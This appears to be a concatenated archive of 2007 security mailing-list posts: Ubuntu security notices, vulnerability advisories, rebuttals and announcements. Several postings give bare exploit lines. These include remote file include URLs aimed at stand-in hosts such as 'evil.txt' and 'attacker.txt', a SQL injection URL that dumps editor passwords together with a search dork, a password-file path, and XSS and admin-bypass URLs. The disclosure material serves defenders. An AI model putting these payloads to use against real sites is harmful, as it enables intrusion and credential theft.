Ovidentia 5.6x Series Remote File #304;nclude
!--- Product : Ovidentia 5.6.x - Website : http://ovidentia.org - Author : H0tTurk-WebSiteVersion:1.x - Problem : Remote File-- include_once $babInstallPath.utilit/mailincl.php;include_once $babInstallPath.utilit/afincl.php; include_once $babInstallPath.utilit/topincl.php; include_once $babInstallPath.utilit/artincl.php;include_once $babInstallPath.utilit/vacincl.php; include_once $babInstallPath.utilit/evtincl.php; include_once $babInstallPath.utilit/calincl.php;---) www.victim.com/path/approb.php ?babInstallPath=http://evil.txt? www.victim.com/path/index.php?babInstallPath=http://evil.txt ? Thx:DrMaxVirus,ajann,GencTurk,uykusuz001,Enjexion,PSYCH@,Arabian-FighterZ,Mefisto,SawTurk,Madconfig,SeanPaul TiT,Salih,HM,Ayyildiz TiMUsers,OzelHarekat/Security BUNDAN OTESi Ya IstiKLaL Ya OLUM
Re: [Full-disclosure] 0trace - traceroute on established connections
Michal Zalewski wrote: Note: this is a 30-minute hack that involves C code coupled with a cheesy shellscript. It may not work on non-Linux systems, and may fail on some Linuxes, too. It could be improved in a number of ways - so if you like it, rewrite it. Slightly rewritten version in C, using libpcap is available here: http://www.swiecki.net/progs/intrace.tgz It should compile and work on Linux boxes. Current version also compiles (but is not tested yet) on FreeBSD6 (and maybe on some other BSD flavors). -- http://www.swiecki.net
London DC4420 meet - Wednesday 17th January, 2007
Happy New Year etc... Hopefully that's the last time this year I'll need to say that! :) I hope you all had a refreshing and constructive break and are looking forward to phun and games in 2007... For our part, we will be kicking off with a meet next Wednesday, January 17th, 2007 at the Charing Cross Sports Club, Hammersmith, starting at 19:30... Map location here: http://www.multimap.com/map/browse.cgi?lat=51.4857lon=-0.2194scale=5000icon=x Nearest tube Hammersmith or Barons Court. I have no idea what talks will materialize, but last time we had too many to fit in so I don't expect there to be a shortage... I've got a few RFID issues to report, and will be doing an experiment in London in the morning, so I'm crossing all my bits that I'll have something quite cool to show for it... :P We are in the process of replacing our webserver, which has given sterling service but is now suffering from advanced senile dementia, so apologies if you have trouble getting in over the next couple of days... Normal service will be resumed shortly... http://dc4420.org Looking forward to seeing you there! cheers, MM -- In DEFCON, we have no names... errr... well, we do... but silly ones...
[USN-407-1] libgtop2 vulnerability
=== Ubuntu Security Notice USN-407-1 January 15, 2007 libgtop2 vulnerability https://launchpad.net/bugs/79206 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: libgtop2-5 2.12.0-0ubuntu1.1 Ubuntu 6.06 LTS: libgtop2-7 2.14.1-0ubuntu1.1 Ubuntu 6.10: libgtop2-7 2.14.4-0ubuntu1.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Liu Qishuai discovered a buffer overflow in the /proc parsing routines in libgtop. By creating and running a process in a specially crafted long path and tricking an user into running gnome-system-monitor, an attacker could exploit this to execute arbitrary code with the user's privileges. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2_2.12.0-0ubuntu1.1.diff.gz Size/MD5: 5556 791af1d912da088b5dbdbaf8aa37b20b http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2_2.12.0-0ubuntu1.1.dsc Size/MD5: 1421 24db7b76b5aec3e8e061197535a203db http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2_2.12.0.orig.tar.gz Size/MD5: 1039660 358b710c463b01ba58ef0b8fe6b23818 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-5_2.12.0-0ubuntu1.1_amd64.deb Size/MD5:59536 00690fbaa259fc912f510534157fe157 http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-dev_2.12.0-0ubuntu1.1_amd64.deb Size/MD5:99396 3aa6528a1bcf3371b7b7eb1ce9a5b92f i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-5_2.12.0-0ubuntu1.1_i386.deb Size/MD5:58386 9195d353c45adca3994a25022eae9a36 http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-dev_2.12.0-0ubuntu1.1_i386.deb Size/MD5:96894 d6ec48f3be35baeaaffb780c1cf5512a powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-5_2.12.0-0ubuntu1.1_powerpc.deb Size/MD5:60424 4f8c50214d838f77395e8c098284ba43 http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-dev_2.12.0-0ubuntu1.1_powerpc.deb Size/MD5:99330 1c587f04173e0c0addb0840b470783e6 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-5_2.12.0-0ubuntu1.1_sparc.deb Size/MD5:58068 4f8f39bab5f25b4539c21daf8f466852 http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-dev_2.12.0-0ubuntu1.1_sparc.deb Size/MD5:96764 28a224d481b8f6afd86e46378b719d0f Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2_2.14.1-0ubuntu1.1.diff.gz Size/MD5: 6343 dbc3bc45b84f78f49633a92ad6993818 http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2_2.14.1-0ubuntu1.1.dsc Size/MD5: 1418 78cd77e17c3825e7118bc7fe12c71156 http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2_2.14.1.orig.tar.gz Size/MD5: 930295 84a7ac187e609594565bb6e731d21287 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-7_2.14.1-0ubuntu1.1_amd64.deb Size/MD5:62640 22fdd503710884583da14ba62a088759 http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-dev_2.14.1-0ubuntu1.1_amd64.deb Size/MD5: 102940 1205833458f90c9f641a9ec4acd99e61 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-7_2.14.1-0ubuntu1.1_i386.deb Size/MD5:61060 e1bab8b7cdcec2a6a56956b193bf4e07 http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-dev_2.14.1-0ubuntu1.1_i386.deb Size/MD5: 100084 e7d740a94cc1a2186ce0a6dfec492e8c powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-7_2.14.1-0ubuntu1.1_powerpc.deb Size/MD5:63616 4d22b62d6b16e9de6e56e684fbc18ff9 http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-dev_2.14.1-0ubuntu1.1_powerpc.deb Size/MD5: 102736 0b54b07153901282568b4913fbfc74d1 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-7_2.14.1-0ubuntu1.1_sparc.deb Size/MD5:60818 5cd7e26033bc1449f924de0a654dab3d
Re: Ipswitch WS_FTP 2007 Professional wsftpurl access violation vulnerability
Dear [EMAIL PROTECTED], shp conditions. However, as the issue involves the control that is not shp marked safe for scripting nor for initialization, it cannot be shp exploited remotely. Moreover, as for know I have not proved it is shp exploitable. shp Unhandled exception at 0x7c840a81 in wsftpurl.exe: shp 0xC005: Access violation reading location 0x41414141. shp In order to analyze the vulnerability one might execute shp wsftpurl.exe with a long argument. Pretending this vulnerability IS exploitable, what is security impact from it? What can you achieve by exploiting this vulnerability you cant archive without it? -- ~/ZARAZA http://www.security.nnov.ru/ Reasoning depends upon programming, not on hardware and we are the ultimate program! (Frank Herbert).
Okul Web Otomasyon Sistemi (etkinlikbak.asp) SQL Injection Vulnerability
--- AYYILDIZ.ORG PreSents... Script: Okul Web Otomasyon Sistemi Script Download: http://www.aspindir.com/Goster/3822 Contact: ilker Kandemir ilkerkandemir[at]mynet.com DORK: inurl:etkinlikbak.asp --- Exploit: etkinlikbak.asp?id=-1%20union%20select%200,editor,sifre,3,4,5%20from%20editor --- Editor Panel: editor_gir.asp --- Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR Special Tnx: AYYILDIZ.ORG
Oracle Passwords and OraBrute
New Oracle Security Paper: How to secure Oracle passwords from rainbow tables and new password cracking patches. Also includes free audit tool called OraBrute to brute force SYS AS SYSDBA in order to check that it has been secured. Unfortunately by default it is not but can be secured by following this papers recommendations. http://www.ngssoftware.com/research/papers/oraclepasswords.pdf
Remedy Action Request System 5.01.02 - User Enumeration
=== Remedy Action Request System User Enumeration === Davide Del Vecchio Adv#11 Discovered in: 08/01/2007 Version affected: Remedy Action Request System 5.01.02 Patch 1267. The same vulnerable code could be present in other versions. Reference: http://www.alighieri.org/advisories/advisory-remedy50102.txt Software description: From BMC Software website: Remedy Action Request System 5.01.02 provides a consolidated Service Process Management platform for automating and managing Service Management business processes. The problem: During user login phase, it is possible to enumerate existing users examining the error messages provided by the software. Suppling a non-existing user the error message is: ARERR [612] No such user is registered with this server user: test, server: 10.10.10.11 Unable to successfully log in to any server. Suppling an existing user the error message is: ARERR [329] Invalid password for an existing user user: user, server: 10.10.10.11 Unable to successfully log in to any server. Solution: Vendor has been contacted 3 times with no answer. Credits: Davide Del Vecchio would like to thank his family and all the people supporting him and his research. Support the rosewitch project. Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Please send suggestions, updates, and comments to: Davide Del Vecchio Dante Alighieri - dante at alighieri dot org http://www.alighieri.org ~ http://legaest.blogspot.com
Re: Re: Re: Uber Uploader 4.2 Arbitrary File Upload Vulnerability
Negative. No bug. No Arbitrary File Upload Vulnerability bug in Uber-Uploader 4.2. No need for admin patch as Uber-Uploader 4.2 blocks .phtml uploads out of the box. *.phtml file blocked client side and server side by default. Please review 4.2 code base.
Outpost Bypassing Self-Protection using file links Vulnerability
Hello, We would like to inform you about a vulnerability in Outpost Firewall PRO 4.0. Description: Outpost protects its files and forbids other applications to manipulate them. Files and directories in its installation directory are guarded by various SSDT hooks. However, the implementation of this protection does not prevent malicious applications to call native API ZwSetInformationFile class FileLinkInformation. Such calls can be used to replace files that are not used by the system when this function is called. One of vulnerable files in the Outpost installation directory is SandBox.sys, the driver that implements Outpost Self-Protection mechanisms. Attackers are able to replace this driver with a fake copy that will be loaded into the system after the next reboot. This can result in a complete system control because driver's code is executed in the privileged kernel mode. The fake driver can be implemented such that the user has no chance to notice the attack. Vulnerable software: * Outpost Firewall PRO 4.0 (1005.590.123) * Outpost Firewall PRO 4.0 (971.584.079) * Outpost Firewall PRO 4.0 (964.582.059) * probably all older versions of Outpost Firewall PRO 4.0 * possibly older versions of Outpost Firewall PRO More details and a proof of concept including its source code are available here: http://www.matousec.com/info/advisories/Outpost-Bypassing-Self-Protection-using-file-links.php Regards, -- Matousec - Transparent security Research http://www.matousec.com/
[USN-408-1] krb5 vulnerability
=== Ubuntu Security Notice USN-408-1 January 15, 2007 krb5 vulnerability CVE-2006-6143 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libkadm551.4.3-5ubuntu0.2 libkrb53 1.4.3-5ubuntu0.2 Ubuntu 6.10: libkadm551.4.3-9ubuntu1.1 libkrb53 1.4.3-9ubuntu1.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: The server-side portion of Kerberos' RPC library had a memory management flaw which allowed users of that library to call a function pointer located in unallocated memory. By doing specially crafted calls to the kadmind server, a remote attacker could exploit this to execute arbitrary code with root privileges on the target computer. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/k/krb5/krb5_1.4.3-5ubuntu0.2.diff.gz Size/MD5: 1447550 546659a7ce8758c26c33d0241adb992d http://security.ubuntu.com/ubuntu/pool/main/k/krb5/krb5_1.4.3-5ubuntu0.2.dsc Size/MD5: 848 ed669b2e38c5b3b6701401b99bbdb3cb http://security.ubuntu.com/ubuntu/pool/main/k/krb5/krb5_1.4.3.orig.tar.gz Size/MD5: 7279788 43fe621ecb849a83ee014dfb856c54af Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/k/krb5/krb5-doc_1.4.3-5ubuntu0.2_all.deb Size/MD5: 852734 748a61c88e96abcc2fd922acdafbd56c amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-admin-server_1.4.3-5ubuntu0.2_amd64.deb Size/MD5:79686 a56316c071cbdae9f33b10166e204340 http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-clients_1.4.3-5ubuntu0.2_amd64.deb Size/MD5: 222738 173b8846edc4d84b0880b293ebd819f8 http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-ftpd_1.4.3-5ubuntu0.2_amd64.deb Size/MD5:59876 11c96393564f5422e884cda60671688d http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-kdc_1.4.3-5ubuntu0.2_amd64.deb Size/MD5: 134570 c2fa98268d5c486988eae91040441720 http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-rsh-server_1.4.3-5ubuntu0.2_amd64.deb Size/MD5:84774 7dc407371c107d79c69ffe054f702ba7 http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-telnetd_1.4.3-5ubuntu0.2_amd64.deb Size/MD5:67044 4a01011a78cf0c299df6b36384c0950b http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-user_1.4.3-5ubuntu0.2_amd64.deb Size/MD5: 129430 2acabc3bcb9323fa28a69e306694a1ec http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkadm55_1.4.3-5ubuntu0.2_amd64.deb Size/MD5: 190294 a4044fce177ca61f9b24ff9515443e5f http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkrb5-dev_1.4.3-5ubuntu0.2_amd64.deb Size/MD5: 768212 bba4e4f35f90a58177f14d35d9fccf1e http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkrb53_1.4.3-5ubuntu0.2_amd64.deb Size/MD5: 425220 e16e7b2709af4fb8a88a0819cdfc1a40 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-admin-server_1.4.3-5ubuntu0.2_i386.deb Size/MD5:71660 d38e87ecea34868e1dac394b9047c382 http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-clients_1.4.3-5ubuntu0.2_i386.deb Size/MD5: 186752 12424ad58c808a4867f0db0d014a34ec http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-ftpd_1.4.3-5ubuntu0.2_i386.deb Size/MD5:53844 3aa5f6a9ae2cb49659a0577ea972d0af http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-kdc_1.4.3-5ubuntu0.2_i386.deb Size/MD5: 121068 9a1fcd42b91849f0a4ce3c1614c3dbb9 http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-rsh-server_1.4.3-5ubuntu0.2_i386.deb Size/MD5:75438 9b264a66dff08d0206370a43058687d1 http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-telnetd_1.4.3-5ubuntu0.2_i386.deb Size/MD5:58204 6e89a58b9d435c6e1422537a18da2dc1 http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-user_1.4.3-5ubuntu0.2_i386.deb Size/MD5: 118528 82f62332c5bae9177ce1f356b824279e http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkadm55_1.4.3-5ubuntu0.2_i386.deb Size/MD5: 165130 0968da19d0bdac05e716825ba045f5e5 http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkrb5-dev_1.4.3-5ubuntu0.2_i386.deb Size/MD5: 646560 89ccbd05cda4887245d7d5c5cd77d383
Jax Petition Book (languagepack) Remote File Include Vulnerabilities
-- AYYILDIZ.ORG PreSents... *Script: Jax Petition Book *Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip *Contact: ilker Kandemir ilkerkandemir[at]mynet.com --- *Code: require ( language/ .$languagepack . .inc.php ); --- *Exploit: jax_petitionbook.php?languagepack=http://attacker.txt? smileys.php?languagepack=http://attacker.txt? --- Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dumnci Special Tnx: AYYILDIZ.ORG
wcSimple Poll (password.txt) Remote Password Disclosure Vulnerablity
--- AYYILDIZ.ORG PreSents... *Script: wcSimple Poll *Download: members.monarch.net/offsite/ZipFiles/wcPoll.zip *Contact: ilker Kandemir ilkerkandemir[at]mynet.com --- *Exploit: http://[Site]/[Script_Path]/password.txt --- Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dumnci Special Tnx: AYYILDIZ.ORG
Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities
This is not a vulnerability. Since $languagepack is prefixed by language/, the PHP stream handler will simply try to open a local file. Also, you can only modify $languagepack if register_globals is on, which, it rarely is these days. Can we stop with the PHP 'vulnerabilities' that aren't? -Blake Whatchu talkin' 'bout, Willis? -- AYYILDIZ.ORG PreSents... *Script: Jax Petition Book *Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip *Contact: ilker Kandemir ilkerkandemir[at]mynet.com --- *Code: require ( language/ .$languagepack . .inc.php ); --- *Exploit: jax_petitionbook.php?languagepack=http://attacker.txt? smileys.php?languagepack=http://attacker.txt? --- Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum?nci Special Tnx: AYYILDIZ.ORG -- Blake Matheny [EMAIL PROTECTED] http://mobocracy.net pgpU9okIiKMsx.pgp Description: PGP signature
Uninformed Journal Release Announcement: Volume 6
Uninformed is pleased to announce the release of its sixth volume. This volume includes 3 articles on reverse engineering and exploitation technology. These articles include: - Engineering in Reverse: Subverting PatchGuard Version 2 Author: Skywing - Engineering in Reverse: Locreate: An Anagram for Relocate Author: skape - Exploitation Technology: Exploiting 802.11 Wireless Driver Vulnerabilities on Windows Authors: Johnny Cache, H D Moore, skape This volume of the journal can be found at: http://www.uninformed.org/?v=6 About Uninformed: Uninformed is a non-commercial technical outlet for research in areas pertaining to security technologies, reverse engineering, and lowlevel programming. The goal, as the name implies, is to act as a medium for informing the uninformed. The research presented in each edition is simply an example of the evolutionary thought that affects all academic and professional disciplines. - The Uninformed Staff staff [at] uninformed.org
liens_dynamiques xss and admin authentification
* liens_dynamiques xss and admin authentification * By : sn0oPy * Risk : high * Site : http://xentraz.free.fr/ * Dork : liens_dynamiques | liens_dynamiques2.1 * exploit : + inject any script on the add menu liens.php3?ajouter=1, you cas del it without admin permission one the del menu liens.php3?supprimer=1 + Be admin : http://www.target.com/liens_dynamiques/liens.php3 replace it by http://www.target.com/liens_dynamiques/admin/adminlien.php3 or http://www.poew.com/liens_dynamiques/admin/modif.php3 * contact : [EMAIL PROTECTED] * greetz : [subzero], Avg Team(forums.avenir-geopolitique.net).
[USN-409-1] ksirc vulnerability
=== Ubuntu Security Notice USN-409-1 January 15, 2007 kdenetwork vulnerability CVE-2006-6811 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: ksirc4:3.4.3-0ubuntu1.1 Ubuntu 6.06 LTS: ksirc4:3.5.2-0ubuntu6.3 Ubuntu 6.10: ksirc4:3.5.5-0ubuntu1.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Federico L. Bossi Bonin discovered a Denial of Service vulnerability in ksirc. By sending a special response packet, a malicious IRC server could crash ksirc. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_3.4.3-0ubuntu1.1.diff.gz Size/MD5: 199853 38e7d4da32bf32366ad77d1ed2dac2f9 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_3.4.3-0ubuntu1.1.dsc Size/MD5: 1287 88bf40bbc5e2de7b12af4747b1409686 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_3.4.3.orig.tar.gz Size/MD5: 9355506 872318e6122f2649a6439eac09a43fd6 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/kdenetwork-doc-html_3.4.3-0ubuntu1.1_all.deb Size/MD5: 206940 799a5f6dbe4070c26fa3ca5b14e0428b http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/kdenetwork_3.4.3-0ubuntu1.1_all.deb Size/MD5:22006 208d7471b12dcf31b5f2923145b9ddf1 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/dcoprss_3.4.3-0ubuntu1.1_amd64.deb Size/MD5:89204 8a6472bade8dd27c59c825226a04fa0d http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-filesharing_3.4.3-0ubuntu1.1_amd64.deb Size/MD5: 652412 f92a4eb8d7427f3346b6c44bd1187aeb http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-kfile-plugins_3.4.3-0ubuntu1.1_amd64.deb Size/MD5:47282 4877f01ebdbdcd650325d925e6e13dd9 http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/kdict_3.4.3-0ubuntu1.1_amd64.deb Size/MD5: 285206 ca6223dc1eb27f55520e41a7199db45c http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/kget_3.4.3-0ubuntu1.1_amd64.deb Size/MD5: 480902 745b3bcf769f6b11f9814735f26bc3a5 http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/knewsticker_3.4.3-0ubuntu1.1_amd64.deb Size/MD5: 466406 c6effefe8530896cbcbf46ce448abf95 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kopete_3.4.3-0ubuntu1.1_amd64.deb Size/MD5: 4780908 13da4a4da4f833a8fac9648342814fde http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kpf_3.4.3-0ubuntu1.1_amd64.deb Size/MD5: 205872 ccf96c3a72b44712da3e21773918c6c6 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kppp_3.4.3-0ubuntu1.1_amd64.deb Size/MD5: 702964 4c12822b0c367e5e9175f829c68bbc0e http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/krdc_3.4.3-0ubuntu1.1_amd64.deb Size/MD5: 513844 ded8952df6aace4e58d9a79fd329e398 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/krfb_3.4.3-0ubuntu1.1_amd64.deb Size/MD5: 957380 574e6b2ed94b85c32acfb0d55deb0a8f http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/ksirc_3.4.3-0ubuntu1.1_amd64.deb Size/MD5: 743316 b96b4daa892fe12056493f2e277ecb9a http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/ktalkd_3.4.3-0ubuntu1.1_amd64.deb Size/MD5: 144992 fcceb89ff85b3bbf1e76e4411e1c1a5e http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kwifimanager_3.4.3-0ubuntu1.1_amd64.deb Size/MD5: 209288 b0c1122c71104d9e519d191e937b4ff4 http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/librss1-dev_3.4.3-0ubuntu1.1_amd64.deb Size/MD5:31724 a4eb736ef5612b5e0b2136ce10abf7fc http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/librss1_3.4.3-0ubuntu1.1_amd64.deb Size/MD5:55778 8dd173cf02cdcccf6c28c4ca7c73a968 http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/lisa_3.4.3-0ubuntu1.1_amd64.deb Size/MD5: 207272 94d49a05ec85e67fdd45a74603234f3f i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/dcoprss_3.4.3-0ubuntu1.1_i386.deb Size/MD5:77334 776afc166f3662bf8ec04770a48f9095 http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-filesharing_3.4.3-0ubuntu1.1_i386.deb Size/MD5: 598730